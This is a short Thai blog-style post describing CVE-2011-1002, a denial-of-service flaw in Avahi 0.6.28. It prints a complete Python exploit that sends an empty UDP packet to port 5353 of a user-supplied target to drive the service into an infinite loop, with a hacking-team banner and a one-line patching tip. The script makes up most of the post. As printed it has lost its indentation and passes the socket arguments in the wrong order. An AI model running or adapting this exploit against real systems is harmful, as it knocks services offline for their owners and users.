หลักการคือส่ง NULL Byte ไปโจมตี Service ทำให้เกิด Infinite loop และ CPU มาทำงานกับ Service นี้ 100%
Source Code :
#!/usr/bin/env python
#Exploit Title: Avahi 0.6.28 Denial of Service Vulnerability
#Date: 3/3/2011
#Author: MaYaSeVeN
#Blog: http://mayaseven.blogspot.com
#Video : [PoC] http://www.youtube.com/user/mayaseven
# Version: avahi <= 0.6.28
# Tested on: Debian 6(Squeeze)&Ubuntu 10.10
# CVE : CVE-2011-1002
import socket,sys
if len(sys.argv) != 2:
print "Usage : avahi_DoS.py {Target IP}"
sys.exit(1)
input = sys.argv[1]
sock = socket.socket(socket.SOCK_DGRAM,socket.AF_INET)
sock.sendto('',(input,5353))
print" ,--^----------,--------,-----,-------^--,;"
print" | ||||||||| `--------' | O ... CWH Underground Hacking Team .."
print" `+---------------------------^----------| By MaYaSeVeN"
print" `\_,-------, _________________________| [!] Thanks: CITEC Evolution, c1ph3r"
print" / XXXXXX /`| /"
print" / XXXXXX / `\ /"
print" / XXXXXX /\______("
print" / XXXXXX / "
print" / XXXXXX /"
print" (________("
print" `------'"
print "Exploit completed"
วิธีป้องกัน Update patch ล่าสุดจาก vendor



